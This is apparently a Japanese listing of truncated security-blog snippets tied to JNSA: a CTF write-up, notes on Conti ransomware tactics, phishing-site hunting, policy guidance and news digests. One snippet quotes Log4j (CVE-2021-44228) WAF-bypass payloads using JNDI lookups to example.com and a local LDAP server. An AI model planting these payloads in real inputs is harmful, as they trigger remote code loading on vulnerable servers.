NPO 日本ネットワークセキュリティ協会
ネットワーク・セキュリティ製品を提供しているベンダー、システムインテグレータ、インターネットプロバイダーなどネットワークセキュリティシステムに携わるベンダーが結集して、ネットワーク・セキュリティの必要性を社会にアピールし、かつ、諸問題を解決していく場として、協会を設立
JNSA行動指針
はじめに 「情報セキュリティのための方針」とは? 具体的な実施例 誰に示すのか? 何を定めるのか? 方向性を示す方針内容の例 支持に関連する方針内容の例 法令、規制、契約上、事業上の要求事項の方針への反映について いつ定めるのか? 誰が定めるのか? どのように示すのか? 個別方針について ISO/IEC 27002:2022から抜粋: NIST SP800-53 Rev.5から抜粋: まとめ 参考資料 その他 参考資料 脚注 はじめに 情報セキュリティのための管理策の中で組織的対策として分類されている「情報セキュリティのための方針」について、主要なガイドラインを参考に自分なりに解釈した内容を、…
SECCON Beginners CTF 2022とは Writeups web - Util 更新履歴 SECCON Beginners CTF 2022とは NPO日本ネットワークセキュリティ協会(JNSA)内にあるSECCON実行委員会が主催しているCTFです。 Beginnersと名の付いている通り、CTF初心者でも解くことができるような難易度の問題も出題されます。 www.seccon.jp Writeups web - Util サイトへのリンクと、そのサイトのdockerファイルが与えられています。 utilのサイト画面 pingチェックができるサイトのようなので、試しに172.…
朝日新聞で1600枚強風で資料とばされたというニュース 資料を自宅にもっていき自宅で焼却しようとした。 そもそも資料の廃棄手順について確立されていなかったのではないか? JNSA、紛失や置忘れで資料紛失もある ★自分の立場としては、所属の物理的な資料の処断ルールの見直しが必要かも 『その後のConti』 書記アクセスkakbot 脆弱性利用prokyshell,prokylogon log4shell,認証に対するブルートフォース 永続化にAnyDeskをインターネットからダウンロードして行う アンチウィルスを止める 侵入先のホスト ReverseSSHをする データの窃取はRclone→Me…
GitHub の Reverse Proxy 型フィッシングサイトの発見と報告 こんにちは、でじこだにょ 今回は GitHub を狙った Reverse Proxy 型のフィッシングサイトを探していこうと思います。 (長いので、Reverse Proxy 型のことをプロキシ型と略しちゃいます) 結論から書くと、24件のフィッシングサイトを新規に発見して報告しました。 今回はそれらのフィッシングサイトの探し方のほか、フィッシングサイトの検出方法や、 セーフブラウジングなどの話をしつつ、 今回見つけたフィッシングドメインに対して、簡単ではありますが、調査と考察を行ってみたいと思います。 探そうとし…
はじめに セキュリティサービス部セキュリティエンジニアの一瀬です。今回はセキュリティエンジニアや IT に関連する組織や個人にとっても有益なリンクをご紹介します。 毎年、様々な機関がセキュリティに関連する文書を公開しています。政府機関のガイドラインや基準は、企業のセキュリティ方針を決める上で重要な指針となります。また、米国国立標準技術研究所 (NIST) が発行する文書や、セキュリティ関連組織が公開する調査報告書などは、セキュリティエンジニアだけでなく IT に関連する組織や個人にとっても有益な情報です。私もそういったリンクを参考にすることが多々あります。そこで本記事では、2021 年に、以下…
調達・製造・販売・消費などの一連の流れを意味する「サプライチェーン」。昨今、そのサプライチェーンの弱点に付け込んだサイバー攻撃が顕在化・多角化しており、企業規模を問わず「サプライチェーンセキュリティ」の対策が急務となっています。 アメリカの政府機関であるNISTは早くからサプライチェーンセキュリティを重要視しており、2017年1月にサプライチェーンリスク管理のフレームワークをまとめています。(参考)日本では、2020年11月に経済産業省や主要経済団体を中心とした「サプライチェーン・サイバーセキュリティ・コンソーシアム(Supply Chain Cybersecurity Consortium:…
【インシデント事例】 ・氏名と生年月日でパスワードを割り出していたSNSの不正アクセス事案についてまとめてみた - piyolog 【攻撃の傾向・手法、攻撃組織の動向】 ・Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure | CISA ・Microsoft Defender weakness lets hackers bypass malware detection ・Phishers are targeting Office 365 users …
【インシデント事例】 ・【独自】国際ハッカー集団、都立2病院を標的か…チャットに職員アドレス大量掲載(読売新聞オンライン) - Yahoo!ニュース 【攻撃の傾向・手法、攻撃組織の動向】 ・APT Groups Register Domain Used for C&C Long Before The Attack To Prevent Detection 【脆弱性情報】 ・「Windows Installer」に“凶悪”な脆弱性 専門家が危惧する理由は?:管理者権限を不正に取得可能 - TechTargetジャパン セキュリティ ・チェック・ポイント、最新版「グローバル脅威インデックス」を公開…
2021年の振り返り(Myself) 昨年最終日のブログ記事にて転職した旨の記事をアップ以来、1年間更新が途絶えていたわけですが(その前からも毎月更新みたいになってましたが。。)お馴染み?の1年の振り返りです。振り返るとこの1年は我が家に第二子が産まれたり仕事の面でも Job Change(転職ではないです、異動です。)があったりと 2020年 に続き激動の年でした。なぜ、またブログ記事を書き始めようかなぁと思ったキッカケですが、異動先のチームの方と 1 on 1 していた際に「テックブログが1年も更新してないなんて!」(見られてたのか!)と有難いアドバイスを頂きまして。異動先のチームが異動前…
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::…
ドイツ全土に迫る「ブラックアウト」の危機…!今、非常事態が実際に起こっている(川口 マーン 惠美) | 現代ビジネス | 講談社(1/4)https://gendai.ismedia.jp/articles/-/90803 広告代理店に勝訴 漫画家・赤松健さん会見|日テレNEWS24https://www.news24.jp/articles/2021/12/24/07998596.html 【セキュリティ ニュース】オンライン会議の「Zoom」、「Apache Log4j」脆弱性の影響を公表(1ページ目 / 全1ページ):Security NEXThttps://www.security-n…
この記事はセキュリティ Advent Calendar 2021 - Qiitaの19日目です。 アラフィフになった記念と、再就職1周年記念に、セキュリティエンジニアとして生きてきた半生を振り返ってみたいと思います。 別に面白くもないし参考になる話もありませんが、この歳で女でセキュリティエンジニアをやっています、というだけでも珍しいだろうと思って書きました。 幼少期〜就職まで 女性のこの手のエントリを見ると、割と幼少期から女性であることを理由に理系に進むことをよしとしないような圧力を受けている人が多い印象ですが、私は幸いにもその手の圧力はありませんでした。これは東京で育ったというのが大きいのか…
この頃、パソコンの調子がおかしい。ブログの更新もままならないかもしれない。 しかし、今回はこの話ではなく、勤務先のパソコンの話である。 Windows 10を使っているのだが、このバージョンアップがうまくいかない。専門家に調べてもらったところ、アンチウイルスソフト*1が問題だったという。ウイルスが原因で、バージョンアップがうまくいかないのかと思っていたら、アンチウイルスソフトが原因で、バージョンアップがうまくいかなかったとは…。 アンチウイルスソフトのみが原因だったかどうかはわからない。他の要因もあったのかもしれない。 ワクチンソフト https://www.jnsa.org/ikusei/0…
この記事では、動画 「エンジニアが生き残るためのテクノロジーの授業 #6:情報漏洩を防ぐために実施すべき対策とは」をまとめています。今使っているパソコンや現在のパスワード管理は安全ですか?日々巧妙化する攻撃をどう防ぐことができるのか、身の回りを再確認しながら押さえていきましょう。 はじめに情報セキュリティを考える中でも、特に情報漏洩について、どのような経路があるのか、どういった攻撃があるのか、といった視点から紹介します。 【筆者】 増井 敏克さん 増井技術士事務所代表。技術士(情報工学部門)。情報処理技術者試験にも多数合格。ビジネス数学検定1級。「ビジネス」×「数学」×「IT」を組み合わせ、コ…
ネットバンキングからの不正送金事件で”出し子”が逮捕された件が報じられていました。 www.asahi.com インターネットバンキングを通じて不正送金された預貯金を引き出したとして、警視庁はアルバイトの●●●容疑者(20)=東京都豊島区南長崎1丁目=を窃盗と電子計算機使用詐欺などの疑いで逮捕し、15日発表した。容疑を否認しているという。 同庁は●●●容疑者が不正送金グループの「出し子」で、昨年10月~今年8月に計約8500万円を引き出したとみている。 サイバー犯罪対策課によると、●●●容疑者は今年3月、ほかの人物と共謀し、東京都豊島区のコンビニのATM2カ所で、他人名義の銀行口座から計250…